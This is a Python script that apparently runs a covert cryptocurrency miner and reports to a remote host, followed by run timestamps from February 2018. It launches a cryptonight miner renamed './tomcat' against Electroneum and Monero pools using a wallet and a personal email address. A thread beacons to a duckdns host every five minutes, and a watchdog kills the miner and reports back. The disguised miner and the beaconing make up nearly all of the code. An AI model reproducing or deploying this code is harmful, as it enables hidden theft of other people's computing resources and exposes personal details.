import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:27:07.920302
#2018-02-17 17:16:03.791002
#2018-02-17 19:03:05.756695
#2018-02-17 20:52:02.012723
#2018-02-17 22:39:04.318495
#2018-02-18 00:22:07.126684
#2018-02-18 02:13:03.666654
#2018-02-18 04:00:08.172320
#2018-02-18 05:51:07.308298
#2018-02-18 07:41:07.248785
#2018-02-18 09:28:07.127193
#2018-02-18 11:14:01.601580
#2018-02-18 13:00:09.794841
#2018-02-18 14:49:04.082631
#2018-02-18 16:37:04.428913
#2018-02-18 18:26:02.149191
#2018-02-18 20:12:07.072462
#2018-02-18 21:58:01.689262
#2018-02-18 23:47:03.200360
#2018-02-19 01:32:06.341434
#2018-02-19 03:21:01.844937
#2018-02-19 05:06:07.094983
#2018-02-19 06:53:01.267545
#2018-02-19 08:41:05.254739
#2018-02-19 10:30:11.308900
#2018-02-19 12:18:05.786962
#2018-02-19 14:05:09.591726
#2018-02-19 15:55:08.053645
#2018-02-19 17:42:01.764298
#2018-02-19 19:29:08.641690
#2018-02-19 21:18:08.166972
#2018-02-19 23:04:06.014057
#2018-02-20 00:49:01.664846
#2018-02-20 02:39:03.590908
#2018-02-20 04:27:05.090839
#2018-02-20 06:11:02.188937
#2018-02-20 07:56:06.496263
#2018-02-20 09:42:01.977750
#2018-02-20 11:26:08.272029
#2018-02-20 13:12:09.388215
#2018-02-20 14:57:01.529133
#2018-02-20 16:41:09.960846
#2018-02-20 18:29:04.368033
#2018-02-20 20:21:03.835410
#2018-02-20 22:06:08.817862
#2018-02-20 23:46:05.622393
#2018-02-21 01:32:05.062377
#2018-02-21 03:19:02.189833
#2018-02-21 05:06:04.816627
#2018-02-21 06:53:05.677155
#2018-02-21 08:39:06.298472
#2018-02-21 10:25:08.053110
#2018-02-21 12:13:01.729866
#2018-02-21 14:01:09.310691
#2018-02-21 15:45:16.315569
#2018-02-21 17:37:07.993910
#2018-02-21 19:22:06.061241
#2018-02-21 21:09:07.492525
#2018-02-21 22:57:08.133035
#2018-02-22 00:46:01.824036
#2018-02-22 02:33:04.943974
#2018-02-22 04:19:04.566076
#2018-02-22 06:04:06.396380
#2018-02-22 07:50:08.936327
#2018-02-22 09:39:03.332498
#2018-02-22 11:24:08.219191
#2018-02-22 13:11:07.512254
#2018-02-22 15:02:04.201499
#2018-02-22 16:46:12.816430
#2018-02-22 18:34:08.145434
#2018-02-22 20:26:09.130619
#2018-02-22 22:12:07.001894
#2018-02-22 23:58:07.486344
#2018-02-23 01:45:06.661994
#2018-02-23 03:35:08.490968
#2018-02-23 05:21:05.026893
#2018-02-23 07:07:04.500542
#2018-02-23 08:56:03.891600
#2018-02-23 11:16:05.943055
#2018-02-23 13:09:05.672847
#2018-02-23 14:55:06.129246
#2018-02-23 16:43:05.473087
#2018-02-23 18:30:09.940611
#2018-02-23 20:14:06.312363
#2018-02-23 22:03:04.522485
#2018-02-23 23:51:04.381437
#2018-02-24 01:42:08.295000
#2018-02-24 03:32:07.329645
#2018-02-24 05:17:06.066316
#2018-02-24 07:04:06.885394
#2018-02-24 08:51:05.274747
#2018-02-24 10:57:07.210614
#2018-02-24 12:44:05.571247
#2018-02-24 14:33:07.472825
#2018-02-24 16:20:01.382785
#2018-02-24 18:14:01.479896
#2018-02-24 19:59:05.365987
#2018-02-24 21:43:01.966217
#2018-02-25 00:38:05.231405
#2018-02-25 04:14:05.969011
#2018-02-25 07:45:09.576055